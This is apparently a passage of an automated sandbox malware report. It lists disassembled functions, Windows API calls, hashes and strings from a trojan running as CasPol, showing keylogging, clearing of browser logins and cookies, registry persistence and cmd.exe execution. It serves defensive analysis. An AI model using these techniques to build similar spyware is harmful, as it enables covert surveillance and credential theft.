                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: EventLocalTimewsprintf
                                                                                                                                                              • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                                                                                                                              • API String ID: 1497725170-1359877963
                                                                                                                                                              • Opcode ID: fcd139a15132826d048fc9099f5513e63a32d772a8cf7c4d95b98b470fd5f9fd
                                                                                                                                                              • Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
                                                                                                                                                              • Opcode Fuzzy Hash: fcd139a15132826d048fc9099f5513e63a32d772a8cf7c4d95b98b470fd5f9fd
                                                                                                                                                              • Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                                                                                • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateThread$LocalTime$wsprintf
                                                                                                                                                              • String ID: Online Keylogger Started
                                                                                                                                                              • API String ID: 112202259-1258561607
                                                                                                                                                              • Opcode ID: c0aab962c7ca1211a7ad70a8f3b20d3c2f1fab31e78c15f9791034d849591584
                                                                                                                                                              • Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
                                                                                                                                                              • Opcode Fuzzy Hash: c0aab962c7ca1211a7ad70a8f3b20d3c2f1fab31e78c15f9791034d849591584
                                                                                                                                                              • Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                                                                                                                              APIs
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
                                                                                                                                                              • GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
                                                                                                                                                              • __dosmaperr.LIBCMT ref: 0044AAFE
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                              • String ID: `@
                                                                                                                                                              • API String ID: 2583163307-951712118
                                                                                                                                                              • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                                                                              • Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
                                                                                                                                                              • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                                                                              • Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F
                                                                                                                                                              APIs
                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                                                                                                                              • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseEventHandleObjectSingleWait
                                                                                                                                                              • String ID: Connection Timeout
                                                                                                                                                              • API String ID: 2055531096-499159329
                                                                                                                                                              • Opcode ID: 9041f7ae570b413ce327d744802055146d1c38930b1ad49fa8d24b0939116539
                                                                                                                                                              • Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
                                                                                                                                                              • Opcode Fuzzy Hash: 9041f7ae570b413ce327d744802055146d1c38930b1ad49fa8d24b0939116539
                                                                                                                                                              • Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A
                                                                                                                                                              APIs
                                                                                                                                                              • RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 0041277F
                                                                                                                                                              • RegSetValueExW.ADVAPI32(?,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,PFb), ref: 004127AD
                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,PFb), ref: 004127B8
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseCreateValue
                                                                                                                                                              • String ID: pth_unenc
                                                                                                                                                              • API String ID: 1818849710-4028850238
                                                                                                                                                              • Opcode ID: ac20c6f818266d456b173dad8d641fd48acc3e355ae729c9f48089b2aa064521
                                                                                                                                                              • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                                                                                                                              • Opcode Fuzzy Hash: ac20c6f818266d456b173dad8d641fd48acc3e355ae729c9f48089b2aa064521
                                                                                                                                                              • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                                                                                                                              APIs
                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                                                                                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                                                                                                                                • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
                                                                                                                                                                • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800
                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                                                                              • String ID: bad locale name
                                                                                                                                                              • API String ID: 3628047217-1405518554
                                                                                                                                                              • Opcode ID: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                                                                                                                              • Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
                                                                                                                                                              • Opcode Fuzzy Hash: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                                                                                                                              • Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C
                                                                                                                                                              APIs
                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExecuteShell
                                                                                                                                                              • String ID: /C $cmd.exe$open
                                                                                                                                                              • API String ID: 587946157-3896048727
                                                                                                                                                              • Opcode ID: 6699625853e23096ac9cad3f7578a7bff2c993ae7ed2a6c2b658dd2f5a42760b
                                                                                                                                                              • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                                                                                                                              • Opcode Fuzzy Hash: 6699625853e23096ac9cad3f7578a7bff2c993ae7ed2a6c2b658dd2f5a42760b
                                                                                                                                                              • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                                                                                                                              APIs
                                                                                                                                                              • TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,PFb,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                                                              • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                                                              • TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: TerminateThread$HookUnhookWindows
                                                                                                                                                              • String ID: pth_unenc
                                                                                                                                                              • API String ID: 3123878439-4028850238
                                                                                                                                                              • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                                                                              • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                                                                                                                                                              • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                                                                              • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00401441
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                                                              • String ID: GetCursorInfo$User32.dll
                                                                                                                                                              • API String ID: 1646373207-2714051624
                                                                                                                                                              • Opcode ID: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                                                                                                                              • Instruction ID: fea3bfcfa5ad703f85b7dd8d5f3eac54d033561bc9bd2fc33d3800e380b32b62
                                                                                                                                                              • Opcode Fuzzy Hash: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                                                                                                                              • Instruction Fuzzy Hash: 51B092B868A3059BC7306BE0BD0EA093B24EA44703B1000B2F087C12A1EB7880809A6E
                                                                                                                                                              APIs
                                                                                                                                                              • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                              • String ID: GetLastInputInfo$User32.dll
                                                                                                                                                              • API String ID: 2574300362-1519888992
                                                                                                                                                              • Opcode ID: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                                                                                                              • Instruction ID: 425bdc246283df71b7ad83aa0519e38d385401eab2b134f4ae8d574857069069
                                                                                                                                                              • Opcode Fuzzy Hash: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                                                                                                              • Instruction Fuzzy Hash: D7B092B85843849BC7202BE0BC0DA297BA4FA48B43720447AF406D11A1EB7881809F6F
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __alldvrm$_strrchr
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1036877536-0
                                                                                                                                                              • Opcode ID: 63f75d4c6ddf9dfadee5a9a28b1451e266bcc439c32975fae3941ae33d1a5297
                                                                                                                                                              • Instruction ID: 63a095292c52d92af2bf19a392fdfa9b0d117a80b68c781492b1ecdde0b53e6f
                                                                                                                                                              • Opcode Fuzzy Hash: 63f75d4c6ddf9dfadee5a9a28b1451e266bcc439c32975fae3941ae33d1a5297
                                                                                                                                                              • Instruction Fuzzy Hash: 60A168729042469FFB21CF58C8817AEBBE2EF55314F24416FE5849B382DA3C8D45C759
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: d2c3ac181d975cfacaee5c3ec40136b8bdf5b2422b9dd14ab5655829a2308330
                                                                                                                                                              • Instruction ID: 90b3d0a8f148eb65ba096d855dd205fb67a40d318d5acb0a54968c3478788488
                                                                                                                                                              • Opcode Fuzzy Hash: d2c3ac181d975cfacaee5c3ec40136b8bdf5b2422b9dd14ab5655829a2308330
                                                                                                                                                              • Instruction Fuzzy Hash: 10412B71A00744AFF724AF78CC41B6ABBE8EF88714F10452FF511DB291E679A9458788
                                                                                                                                                              APIs
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                                                                                                              • __freea.LIBCMT ref: 100087D5
                                                                                                                                                                • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4186874207.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4186834676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4186874207.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2652629310-0
                                                                                                                                                              • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                                              • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                                                                                                              • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                                                              • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                                                                                                                              • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Sleep
                                                                                                                                                              • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                                                                              • API String ID: 3472027048-1236744412
                                                                                                                                                              • Opcode ID: fb9c94c919f491c47112702eb50a98d9c9131fc5c480903e1a404da5156a74b6
                                                                                                                                                              • Instruction ID: 8ec9c8031b8ac0664cfb8a22ca307bf710261ddd843e88104a77dac6ce00e7b7
                                                                                                                                                              • Opcode Fuzzy Hash: fb9c94c919f491c47112702eb50a98d9c9131fc5c480903e1a404da5156a74b6
                                                                                                                                                              • Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                                                                • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                                                                • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                                                              • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseOpenQuerySleepValue
                                                                                                                                                              • String ID: @CG$PFb$exepath
                                                                                                                                                              • API String ID: 4119054056-1522004553
                                                                                                                                                              • Opcode ID: 210cb540f6a83319de20fac2fd682447bc31916e54f5a605e097a05a178efdaa
                                                                                                                                                              • Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
                                                                                                                                                              • Opcode Fuzzy Hash: 210cb540f6a83319de20fac2fd682447bc31916e54f5a605e097a05a178efdaa
                                                                                                                                                              • Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
                                                                                                                                                              APIs
                                                                                                                                                              • EnumDisplayMonitors.USER32(00000000,00000000,004186FC,00000000), ref: 00418622
                                                                                                                                                              • EnumDisplayDevicesW.USER32(?), ref: 00418652
                                                                                                                                                              • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004186C7
                                                                                                                                                              • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004186E4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DisplayEnum$Devices$Monitors
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1432082543-0
                                                                                                                                                              • Opcode ID: d5f935f21ff977a325b16e0238022c9b65baa15484adc771af36005d0498d86d
                                                                                                                                                              • Instruction ID: c4057a13d51126afc728f52e86ef46095e095b9ab785e002ac05b4ca5e4d76c5
                                                                                                                                                              • Opcode Fuzzy Hash: d5f935f21ff977a325b16e0238022c9b65baa15484adc771af36005d0498d86d
                                                                                                                                                              • Instruction Fuzzy Hash: 9221B1722043046BD220EF16DC44EABFBECEFD1754F00052FB949D3191EE74AA45C6AA
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: SystemTimes$Sleep__aulldiv
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 188215759-0
                                                                                                                                                              • Opcode ID: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                                                                                                                                                              • Instruction ID: 3b66203fd79088dfadce72ddbf0b0401c54eb4bd27628439374ba0e7aa9136f0
                                                                                                                                                              • Opcode Fuzzy Hash: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                                                                                                                                                              • Instruction Fuzzy Hash: 9D215E725083009BC304DF65D98589FB7E8EFC8654F044A2EF589D3251EA34EA49CB63
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
                                                                                                                                                                • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
                                                                                                                                                                • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
                                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$SleepText$ForegroundLength
                                                                                                                                                              • String ID: [ $ ]
                                                                                                                                                              • API String ID: 3309952895-93608704
                                                                                                                                                              • Opcode ID: 92cb9d2a2d6bf6289d44fec474a7e000b4a54ab88b054bee990bed59a71b9a03
                                                                                                                                                              • Instruction ID: a5f4dc9a3e016f43683dc3f70dfd76a68f9d753ffdb665cb1c6be196efeb7d0c
                                                                                                                                                              • Opcode Fuzzy Hash: 92cb9d2a2d6bf6289d44fec474a7e000b4a54ab88b054bee990bed59a71b9a03
                                                                                                                                                              • Instruction Fuzzy Hash: 4611C0325082005BD218FB25DC17AAEB7A8AF51708F40047FF542221E3EF39AE1986DF
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
